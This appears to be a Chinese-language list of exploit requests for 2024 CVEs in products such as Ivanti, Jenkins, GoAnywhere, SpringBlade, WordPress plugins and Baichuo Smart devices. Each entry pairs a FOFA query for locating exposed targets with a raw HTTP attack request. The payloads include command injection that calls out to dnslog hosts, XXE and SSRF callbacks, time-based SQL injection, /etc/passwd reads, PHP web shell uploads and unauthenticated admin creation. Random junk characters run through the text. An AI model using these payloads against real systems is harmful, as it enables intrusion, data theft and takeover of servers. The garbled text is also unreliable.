8 q" Z5 {) ?. D/ V# v7 ]FOFA:app="Ncast-产品" && title=="高清智能录播系统"
$ \! T- D4 `* z, ~7 }9 X" kPOST /classes/common/busiFacade.php HTTP/1.14 A9 N6 P; d- Q8 w$ I
Host: 192.168.40.130:8080, \. H# z- J9 B% v5 u6 {* e
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.02 p4 K1 N" T- K2 P& e& m% s9 b
Connection: close( s. y# Y% M7 G$ J) G" ~+ l
Content-Length: 154
) l8 { Y9 l6 h0 @0 ~& fAccept: */*( d( t1 b; D9 @0 R# S# B
Accept-Encoding: gzip, deflate0 e2 d2 i4 }7 C+ a1 w! g1 \
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2: _# s$ d; h' t! Q/ C& r% i
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
/ ~# L$ t( H& d" ?X-Requested-With: XMLHttpRequest
' u8 ]# h1 A( Z" D S) t; m
+ |! E! G) e* K$ J5 E, d%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D
5 s B. K3 P& u9 l6 l/ E/ m! i0 Y" d$ M% P$ {6 C
) K( U) e3 f2 y+ K
100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传( z/ C: p8 K' Z) [/ Q7 k9 ]6 N
CVE-2024-0352
' `+ @; c( W8 o. S5 x1 b1 VFOFA:icon_hash="874152924"& U9 M- G, a% E
POST /api/file/formimage HTTP/1.1
$ ]2 ^. [6 i$ a- X4 Q+ rHost: 192.168.40.130, l1 l. v4 n; k+ i/ p; @
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36+ u; ~$ ^+ q$ e0 h
Connection: close
7 J9 e( \5 L. X9 j# c% U6 xContent-Length: 201 z% h2 u7 i& X1 }. z* C8 X
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
8 g6 I" ^2 w/ O* R2 HAccept-Encoding: gzip/ K3 f5 r8 G* N
6 @% ?. ~& n$ C1 U------WebKitFormBoundarygcflwtei' C0 y) m; ]( ~; V8 E; ~3 x
Content-Disposition: form-data; name="file";filename="IE4MGP.php"4 p; t4 y" h9 j7 e. i
Content-Type: application/x-php5 N M% \- C( Y" Y
" Y9 h2 d/ \& u) s
2ayyhRXiAsKXL8olvF5s4qqyI2O0 y* Y3 X* r' m4 U# q2 K8 |) {. m7 g
------WebKitFormBoundarygcflwtei--
1 ?3 f3 @; n* ~- I
. Z; u% |" g ` d
6 \, Q0 ^ {* X, K101. ivanti policy secure-22.6命令注入
( I+ ^. I* e- n1 A* p5 a* bCVE-2024-218870 K' K" H6 h t0 P4 F( J% Z
FOFA:body="welcome.cgi?p=logo"6 R% ?6 h7 U4 i. L
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
& o; h4 Y A8 F2 O- RHost: x.x.x.xx.x.x.x+ j7 b3 W2 R x: O
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36* v" v) r6 c. w! B& @ w$ Q
Connection: close, P1 n. V P% B& U6 V8 R
Accept-Encoding: gzip. _: `7 O$ y- I: @1 \
L0 R M! V7 d9 h4 a6 T* e0 t0 E# _7 \7 P9 [& @: h; q2 y" @ D
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
* `; k# ?+ F, H G# L/ @CVE-2024-21893
; X4 i2 w! R2 P5 ~FOFA:body="welcome.cgi?p=logo"2 v0 @+ H/ g8 O. D( O
POST /dana-ws/saml20.ws HTTP/1.1$ O- i+ T, _; M6 M+ }
Host: x.x.x.x6 L- p# Q3 \9 L+ N1 g# f
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
2 w! B L( o5 PConnection: close
: D, X* \4 \5 v6 SContent-Length: 792
6 U( N: M0 F4 A! Y$ S3 t) PAccept-Encoding: gzip/ L8 q- ^; D, l, P% l
2 k+ \% A1 q. `0 d<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <<ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>& n8 Z8 T1 r! q, {& f7 w9 b0 f
# I' s$ Y. t# _9 G6 b+ r) d3 i103. Ivanti Pulse Connect Secure VPN XXE
7 A; s) m+ U' D* N! Q9 \# H( ?6 q; dCVE-2024-220248 ?# W% q5 _! o. j
FOFA:body="welcome.cgi?p=logo"
9 {$ T' o/ t! }0 x7 t8 YPOST /dana-na/auth/saml-sso.cgi HTTP/1.17 t- R; |5 m% p: ?! H" v0 U
Host: 192.168.40.130:111, l8 p; a3 d( m% W" a2 B1 @
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
2 m, B( S4 K; {% }Connection: close' Z* B' U# ]/ ~- A" }4 ^
Content-Length: 204: i+ j$ D0 a8 W% U
Content-Type: application/x-www-form-urlencoded' s& ^8 n+ a' |2 @; |
Accept-Encoding: gzip7 i0 u; h8 e& A" p" e8 ^' N) ?- r
6 k' W. z; \( u8 X& [# }; \
SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==
- f9 u* U$ z3 l, C: T& F% j" f" y1 C A+ U h: B! t; r
# U$ Y8 \( W, r! ]8 D3 k
其中SAMLRequest的值是xml文件内容的base64值,xml文件如下
5 T* C* t9 x; X1 i1 i/ Y9 y% B<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>
+ F F( Z! G1 @5 ?7 }: V1 W6 f: _: d& g7 K. ?6 D( h7 d8 [
" O3 ?- g( D" O% m# P! T- s
104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
9 [ i6 C' H' ]9 ~+ ?! nCVE-2024-0569" [$ _( z; `0 Q$ g/ C! Y
FOFA:title="TOTOLINK"
+ o: s( k9 O1 M, Y1 ^7 xPOST /cgi-bin/cstecgi.cgi HTTP/1.19 y2 U1 J$ h+ H, J
Host:192.168.0.17 D. Y! F# j/ B. \
Content-Length:41+ I5 k9 a7 ^8 @! R
Accept:application/json,text/javascript,*/*;q=0.01
9 q9 n. B' J7 T# xX-Requested-with: XMLHttpRequest+ P' f X8 }1 ]
User-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.36
5 Q0 |8 Z" ^$ U3 n# ]# n8 x2 aContent-Type: application/x-www-form-urlencoded:charset=UTF-8# Q P0 j6 @: V1 G2 g3 c4 O
Origin: http://192.168.0.1+ U8 a+ J2 O2 B1 ~) O* T* X! K9 F5 |
Referer: http://192.168.0.1/advance/index.html?time=16711523805647 @! X$ ~; h3 S4 [+ [; |
Accept-Encoding:gzip,deflate4 I8 M( k1 m# k& ^0 O* l
Accept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.7& s& U' G- V1 P/ Q, J
Connection:close4 s' x5 M. @- }* j- h, p* B. l# C; R+ F
5 y$ _) M! [1 t+ g! _ g{
! Z+ i! s' i4 t3 ]4 Q7 N"topicurl":"getSysStatusCfg",
, |: ^! O* o9 W( o6 d' @"token":"": N! M$ Z/ A+ C' L K
}; i# k! u! n5 \* _- Z2 Q
+ F9 m9 [1 ]; O105. SpringBlade v3.2.0 export-user SQL 注入
0 n6 Z+ X- S$ p% \/ E9 Q' X# iFOFA:body="https://bladex.vip"
Y) |4 L8 Z/ M& Z4 _8 ohttp://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1; l! _& ^1 b0 L i4 `+ N
l/ b" `0 C2 ~( @$ P9 T# U
106. SpringBlade dict-biz/list SQL 注入
F* |1 f0 z0 g2 {3 zFOFA:body="Saber 将不能正常工作"! Q; H! l( e7 B/ i1 m
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
6 x; N: y! W" `Host: your-ip
5 x E& J5 ?' r7 d9 E9 j- u% J5 V# p$ fUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" i& \8 x$ d( q, F: \9 q# V
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
) m# T3 ]) V' { C9 c' U& s1 i7 QAccept-Encoding: gzip, deflate7 h/ {2 S, `0 u2 I5 X0 s, Z. @
Accept-Language: zh-CN,zh;q=0.9& l/ t3 C" h* K; q4 E
Connection: close
; s' o! R# } Z, t% j9 V( e! \( E0 I4 Z" f
* h2 ?) Y; M* }# |6 ]6 ]
107. SpringBlade tenant/list SQL 注入$ o" a. ?) R) R/ |2 j9 }
FOFA:body="https://bladex.vip": _0 |! K! u) k8 \% M5 [
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1% P- K. s2 v0 B4 A/ Q# x+ \
Host: your-ip' r& H* b4 g5 s
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" u- W4 y( P! K
Blade-Auth:替换为自己的: X( T& ?9 u3 I' d9 O4 y7 z8 u
Connection: close
. `( d' v5 A A% O" F8 }% N. x0 U8 n2 S7 }' B% r! L
& C3 ?# Z; W0 J/ l. T9 H8 P108. D-Tale 3.9.0 SSRF
, p4 n( }: m) [1 ]2 U/ HCVE-2024-21642$ E* R3 O$ O$ H: A; J" R" R
FOFA:"dtale/static/images/favicon.png". b1 r% B5 n3 k# W8 v2 \
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
2 |6 y; ?" L: c" s8 @. O% CHost: your-ip
" @: C9 ~- d+ _; H( iAccept: application/json, text/plain, */*& b; w& w; _" _5 W: _
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
_8 m' q/ m, LAccept-Encoding: gzip, deflate
( x/ v; ~+ h( {8 z+ @Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
! v9 b+ c) q9 r! }0 I% f( h8 wConnection: close% ?) @, S+ @9 G. s: L* J
}& U/ z/ p! z7 s# l& r( x/ m& k! C( `! ?& C/ W# Q7 g5 f A
109. Jenkins CLI 任意文件读取
4 N5 B4 S/ h8 a; f$ {& vCVE-2024-23897
3 T, U% r+ _+ l4 J* v% Q Z. ZFOFA:header="X-Jenkins"
2 L8 m v" _, }* [! mPOST /cli?remoting=false HTTP/1.18 O5 C% A" j! g
Host:
8 U) @: _( u: l! _7 @Content-type: application/octet-stream
! A7 u; |" D9 c: G5 ~7 dSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
$ \4 b4 b6 B0 t7 p+ USide: upload+ H0 _5 [1 c/ p4 ~# ]0 ?
Connection: keep-alive
! @+ `0 {; `/ D) ?; uContent-Length: 163# {, v/ k7 b7 x& ?2 f
7 t: P% s* I, Q0 b
b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'! I% A0 | p( V( p4 |7 G
( `( w# |% h; c6 l; V, |! j y( g
0 ]1 F t4 @! v6 ]+ ]% qPOST /cli?remoting=false HTTP/1.15 n; r p0 {% A: Z* x
Host:
5 n' D! L# X$ pSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92: b( v. |3 l8 w2 n. e* j
download& N1 {4 d( C {7 m
Content-Type: application/x-www-form-urlencoded6 n" o" u9 g* i/ X
Content-Length: 01 l: M7 \: B8 k7 [9 R
9 J/ o) o6 s6 z
) W( Q0 a6 t5 s+ \1 @8 lERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
$ m2 d/ s- A' e# D' Tjava -jar jenkins-cli.jar help
. P; A' E& m( h7 d[COMMAND]
% s' R7 H2 G8 w/ d' a4 HLists all the available commands or a detailed description of single command.
% ]+ K0 |# V" r) o7 ~ COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)
8 X7 P4 V8 J4 ^0 o" K
4 G5 q& i( Z! D% Z% U
+ R# L! j4 ^3 ?9 s+ I110. Goanywhere MFT 未授权创建管理员# v) s E0 v Q0 h
CVE-2024-0204
5 k/ Y) I% H; t2 E8 _1 J, F; N0 FFOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"2 X4 |( v; ~3 Q3 q+ N
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.12 }8 ~/ Y' C: _$ c; ~9 z* E$ j
Host: 192.168.40.130:8000
; ?+ p2 H) v2 u8 W0 V, L {, kUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36# r$ U* ?& j2 v( M+ `8 _
Connection: close# p) |8 b$ Z( q9 A5 m3 P, V1 f' X
Accept: */*
0 _' o8 d$ A' P7 V$ |Accept-Language: en6 b" l" h3 p7 I9 a/ j. k9 q* u* |7 @
Accept-Encoding: gzip
0 Y$ w2 f+ m3 c- D4 e- U; c4 g+ p- | X H3 n2 c
8 r2 k( R v- s3 V& U5 ~111. WordPress Plugin HTML5 Video Player SQL注入
1 E/ ?9 U1 ^: @/ MCVE-2024-1061
- M" j& D: Z7 [- u6 ^: ~FOFA:"wordpress" && body="html5-video-player"4 Z0 s- D8 d$ Q% G
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.16 @& B; r+ A* v8 A) [5 I8 [
Host: 192.168.40.130:112
: k- H% ~) Z1 K+ i3 SUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.365 Z$ L' B( J* n% L5 M, E
Connection: close
) g; W. N# H0 f0 j3 ~; ?Accept: */*: l: O, s9 I# x' |
Accept-Language: en/ V$ H9 k' a3 f5 h- o: l& h; i
Accept-Encoding: gzip
* T5 @" D- [6 l% Z2 o" l& w. C- p
1 M7 i1 z& u$ c* W$ _" K2 y5 x7 L7 r
) B0 Y# j7 O- _8 P2 s. C* ?112. WordPress Plugin NotificationX SQL 注入' k5 k; v' n& F x; F) ~1 o y
CVE-2024-1698* u2 w1 U4 D) M* M z, X
FOFA:body="/wp-content/plugins/notificationx". e$ |$ @; z% Z& L' Y1 S/ u) P
POST /wp-json/notificationx/v1/analytics HTTP/1.1
# o. d9 {: A7 d5 P9 O$ GHost: {{Hostname}}
6 O* @/ Q$ B7 @5 F; A2 NContent-Type: application/json5 S. |; m5 s4 x3 a* `
. b% ]8 y9 a @# m" L{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}7 l9 e2 {2 r( [% B% u. c) j
: h8 Z1 p- a- k& ?/ `
) n T" p5 s E9 l7 j! k) r113. WordPress Automatic 插件任意文件下载和SSRF
! |$ @6 I& Q8 N# @CVE-2024-27954
! O4 a+ k; J( W4 A$ G% w2 xFOFA:"/wp-content/plugins/wp-automatic"9 i6 [9 y. _1 P$ T+ ~* q* I
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1 A: e7 ^1 B- o9 g. K' C
Host: x.x.x.x7 g& U) N4 a$ H3 V$ y
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
# ~1 k/ _* M: k- j9 n7 _/ M rConnection: close6 }$ j" v- |; @3 C4 v2 j; u
Accept: */*' E+ ?6 w: e' A/ Y9 e" I" d6 @% A8 B) W
Accept-Language: en# M3 s o4 o0 j3 U. G ?
Accept-Encoding: gzip# B; Q% @# K s N$ x
* {) G. U( @( g, }: c8 s5 u; @2 ~6 C2 k
114. WordPress MasterStudy LMS插件 SQL注入
' w* x8 N, ~+ K% G& `FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
- @. J- G! Q! YGET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1% f% A0 w8 p6 u5 y h2 q
Host: your-ip* [% I" Y& l& i
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36* _" j! M' W7 P$ U/ y* t
Accept-Charset: utf-8
0 ]3 ^" j0 I3 xAccept-Encoding: gzip, deflate. n$ O" I' Z7 l* _% n8 P
Connection: close
/ [5 I5 H1 w# Z* B- T1 y. O) \+ m) G: {+ m; ~
( d* V2 P+ n8 M! j" A115. WordPress Bricks Builder <= 1.9.6 RCE
) I% E4 h% w! i8 _1 uCVE-2024-25600) U4 D$ {9 O7 E& M+ @- i2 O
FOFA: body="/wp-content/themes/bricks/"
; p- _$ X" p, k' E" X7 h第一步,获取网站的nonce值5 G$ t3 r) Y* F
GET / HTTP/1.1
3 J) y/ Z# p* j4 pHost: x.x.x.x& b- `1 j: H9 U4 Z6 j7 R, T8 p* ^: V
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
2 L/ {! { ?: t( KConnection: close
. c( M9 O$ |' F. b& u. ZAccept-Encoding: gzip
7 ~1 S F L* I' d
1 k4 V9 n1 {; M% c, }! z
, H I! Z8 O: m第二步替换nonce值,执行命令* j4 Q+ k1 l- q. |. m) k
POST /wp-json/bricks/v1/render_element HTTP/1.13 @9 ^6 w2 T: l, C
Host: x.x.x.x
) s1 S2 V- @0 Y: m; ]2 T/ YUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.367 c. O# Y% u ~8 ]" z1 D: n; G
Connection: close# o# V6 [7 K( \1 J
Content-Length: 356
+ Y7 `% W! B6 Q% @) }; sContent-Type: application/json6 f. u% m. _! q$ F) d3 f! R2 E
Accept-Encoding: gzip9 D m6 n" [* R" r. e
1 N3 k D3 A9 d4 y{
* `3 _ O3 }$ L0 s- K"postId": "1",
1 e2 @' [* Y. L, z, m- m "nonce": "第一步获得的值",! y8 z. l' L" \' A2 K
"element": {* t4 ?1 s- a4 @; N- h4 l: u* }
"name": "container",
7 S, c1 Q. z$ l3 Q2 O! y' P "settings": {3 C: d4 M2 p4 }
"hasLoop": "true",# m+ ~; a$ D1 M8 |2 I7 Q# X* T+ O
"query": {' |- q) z5 K: l! Z
"useQueryEditor": true,
, e+ q5 r# k5 Y4 z7 K5 f7 P "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",; k' l0 Y3 y6 N, ?
"objectType": "post"
+ x1 n$ m. F3 [8 @& v }( |" r) i4 S+ |' J1 L& `7 G
}
9 O) J- Z# F3 E& [1 H }
4 |) r8 D# e9 X/ d7 l6 [}
& j# a/ ] a* _( C$ { Z$ d% x9 Y2 {$ R6 x2 o( G- N% m6 ?" {& \" o& @* @) r
0 J- N7 _6 G4 r$ z4 N
116. wordpress js-support-ticket文件上传
' ~5 m, P' J6 I# u, E1 g3 R7 W1 gFOFA:body="wp-content/plugins/js-support-ticket"2 V! u! ]2 u, w+ Q5 N6 F
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.15 b5 }( z+ \, q- {9 b
Host:) \& t2 y6 T+ M0 q) t8 K
Content-Type: multipart/form-data; boundary=--------767099171# h6 l U8 N( L0 Q
User-Agent: Mozilla/5.01 j3 r# c) S& x+ E5 p% z
: I1 B% p d! {, q
----------767099171) q/ H- }( d5 f4 X
Content-Disposition: form-data; name="action"$ X5 u$ \0 ~+ V- h
configuration_saveconfiguration1 r( k1 a2 t/ g$ i8 \
----------767099171
" @- Y" {1 i' |$ o( x% q5 `/ V9 z. QContent-Disposition: form-data; name="form_request"
& s2 Z& I* s; ~7 u( c% |jssupportticket
8 `( i" T; ~3 t; w- f----------767099171
5 N, A+ d6 [' t! j7 d: BContent-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"$ j m7 ]4 v& T0 W% a( ]
Content-Type: image/png* s+ C h! c! b" H+ z/ i) u& y
----------767099171-- k; C+ }% C8 D% W: i8 e
) h( U) ?9 V# b1 e
, n$ A* `) {9 J# \/ ^# T! v
117. WordPress LayerSlider插件SQL注入1 Q9 R4 t- M5 x6 X _2 o
version:7.9.11 – 7.10.05 O' D5 P9 E- t
FOFA:body="/wp-content/plugins/LayerSlider/"! R# \( C; T" g# Y0 Y! E
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
6 Z4 r7 x0 T9 G" x9 z1 b- sHost: your-ip
# i0 T% Z' j# eUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.05 M2 z+ j4 {6 z8 U
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
; _2 `: B; m# ?* ~- z/ UAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 c, a1 }. P- ?3 @/ d
Accept-Encoding: gzip, deflate, br& m* K9 R- M+ c
Connection: close A# j% e$ s' {! S# S+ q% p( A2 T: f
Upgrade-Insecure-Requests: 19 g9 D/ v5 \+ i) m7 @( a7 c* i/ c
3 W, Y; Y9 Q c/ H. M' s% g
5 Y2 c6 T/ ~* @5 S& f$ Q2 k118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
2 ~) O% C' |8 L( B2 u* pCVE-2024-09393 I& T# n9 Y# F4 k
FOFA:title="Smart管理平台"
& z" m% g- k' B2 J! Z1 `POST /Tool/uploadfile.php? HTTP/1.1
: c$ s( a9 O2 l0 t3 dHost: 192.168.40.130:8443
; p2 e N" p8 `- t& MCookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f84 T- X/ B* W! j ]- K- T
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
; v3 P+ A7 m3 s# T: ^& }7 y: R" AAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
" T& a5 g/ T. l% r3 CAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2- n5 Y$ h7 x# F$ ]6 N
Accept-Encoding: gzip, deflate
/ a) t. [. U0 y; F7 [* fContent-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887, A- `( g! d! ~+ p0 `/ y
Content-Length: 405+ k, ]+ {+ O' i; G, m, Q
Origin: https://192.168.40.130:8443
/ F6 r. H' ]( w5 ZReferer: https://192.168.40.130:8443/Tool/uploadfile.php
; p2 V* i& n1 f' a& D$ {Upgrade-Insecure-Requests: 1
: g/ n/ p) c- RSec-Fetch-Dest: document
- C1 h0 H7 U3 NSec-Fetch-Mode: navigate# C! ]5 h' |2 k2 U1 L0 d4 a
Sec-Fetch-Site: same-origin s/ |8 M' h& W% Y; U6 C1 }. Q
Sec-Fetch-User: ?1
# B8 ?' } W* c( X. u0 T" pTe: trailers
+ K0 a( ^/ F. h4 {' W# MConnection: close; Z" y) `, |. K/ b' S* x
3 m9 l9 r+ t: {! C# P-----------------------------13979701222747646634037182887
# T5 b* ?3 a! X. z$ _& d7 O6 S; HContent-Disposition: form-data; name="file_upload"; filename="contents.php"
! k5 e3 f! c2 f+ t2 F$ @Content-Type: application/octet-stream
; n% ?) C6 z. k5 X* T
5 a1 @% H$ Z a1 D) h2 N4 V<?php
# g+ q/ T7 ` isystem($_POST["passwd"]);
# d5 P6 j$ N9 b# T8 ?/ S?>+ e5 [ E1 p$ _! J/ Y- N9 Z
-----------------------------13979701222747646634037182887
5 z9 x# v+ G7 |2 s, f; eContent-Disposition: form-data; name="txt_path"
F& P% k+ z0 t: A, u% Y) `
" I5 ^& K) K5 k+ o6 |8 c/home/src.php
7 x( B# | C" Z: l, ~! x7 @( F) T4 n-----------------------------13979701222747646634037182887--- s! M% e: v" Z
$ o2 q) J+ w5 Z U+ o j" B
* T8 \3 `2 h# T% c- d% v访问/home/src.php: `8 L+ u. R# b0 ~
9 u5 r. m7 L. {1 P0 F; g119. 北京百绰智能S20后台sysmanageajax.php sql注入/ F0 \( P+ m6 J0 y/ U7 ^$ w
CVE-2024-1254
. t0 ^0 c% {& C8 W8 N+ T. t4 k, pFOFA:title="Smart管理平台"1 {* e1 m& V) i1 ~: }* n
先登录进入系统,默认账号密码为admin/admin
1 q8 ~2 [9 |' w/ yPOST /sysmanage/sysmanageajax.php HTTP/1.116 H u9 k. ]0 g4 z& q& W5 f) u
Host: x.x.x.x. {% [2 Z1 `7 f R# D9 [2 U
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee5 W2 Q7 D5 `2 B& t' b* t" D6 X
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
w9 a! }$ H! S: D! F8 nAccept: */*
" D( v% m. o& ?' Z6 iAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2, Y) p0 `) p5 W% N5 V$ V
Accept-Encoding: gzip, deflate8 X( f: w+ }. w! [% G3 o
Content-Type: application/x-www-form-urlencoded;+ x9 h1 X* D2 h" K. |6 O1 c+ j1 Z) V! J
Content-Length: 1090 v# S( i0 N& d: `( L3 q2 s
Origin: https://58.18.133.60:8443 w* U4 y) N' y6 E: n5 S
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
3 t8 R8 r7 w' z, s6 a4 CSec-Fetch-Dest: empty4 j, C c) B, r( w
Sec-Fetch-Mode: cors
% ]1 \ ^! k: t- ^! x" pSec-Fetch-Site: same-origin& L# N2 N. G& u( S- j+ S, ~- ~
X-Forwarded-For: 1.1.1.1
0 Q7 J" Z+ R5 Q" M" X( ?! T; Z8 S# mX-Originating-Ip: 1.1.1.19 _% Z- B1 o1 o' l. i
X-Remote-Ip: 1.1.1.13 q4 Y9 M+ |1 P; @
X-Remote-Addr: 1.1.1.1
4 x+ F0 f- ^6 ?$ TTe: trailers9 A4 s- W. u" p
Connection: close! ^9 V: `# W9 o" N8 \ M" @
! L, P0 t; P+ P0 X. @
src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456
1 O+ d) T0 S5 w; b7 [" Z3 L9 P4 Y& ~1 u; F& t
* ?) W7 H c" A
120. 北京百绰智能S40管理平台导入web.php任意文件上传
( X; n: Q- e$ w! i( S$ OCVE-2024-1253
